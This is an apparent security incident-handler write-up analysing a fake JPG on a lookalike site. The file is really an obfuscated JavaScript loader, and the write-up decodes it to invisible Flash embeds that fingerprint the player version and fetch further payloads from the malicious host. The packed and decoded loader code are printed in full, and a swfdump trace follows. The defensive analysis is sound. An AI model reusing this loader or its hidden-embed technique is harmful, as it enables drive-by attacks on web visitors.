Marco and Eric wrote in to let us know of a potentially malicious site found at
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.jpg
The JPG file is actually a script, shown below:
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))
Using spidermonkey, it decodes to:
if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
document.cookie="playon=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('</object>')}else{document.write
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}
Lets get the swf files and see what they do, wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9
Virustotal shows 0/32 for both files.
Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER] File version: 9
[HEADER] File is zlib compressed. Ratio: 96%
[HEADER] File size: 208 (Depacked)
[HEADER] Frame rate: 12.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c00c] 138 DOACTION
( 99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/"
String:"ff.swf" String:"_root"
( 4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
( 0 bytes) action: GetVariable
( 0 bytes) action: DefineLocal
( 4 bytes) action: Push Lookup:2
("http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/")
Lookup:0 ("flashVersion")
( 0 bytes) action: GetVariable
( 0 bytes) action: Add2
( 2 bytes) action: Push Lookup:3 ("ff.swf")
( 0 bytes) action: Add2
( 2 bytes) action: Push Lookup:4 ("_root")
( 0 bytes) action: GetVariable
( 1 bytes) action: GetUrl2 64
( 0 bytes) action: Stop
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END
Running the swf files in a web browser gives me the following URLs:
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ff.swf
and
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ie.swf
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.
Thanks to Bojan and Jeremy for their help!
Unknown at this time if these SWF files are related to this vulnerability.
Cheers,
Adrien de Beaupre
Bell Canada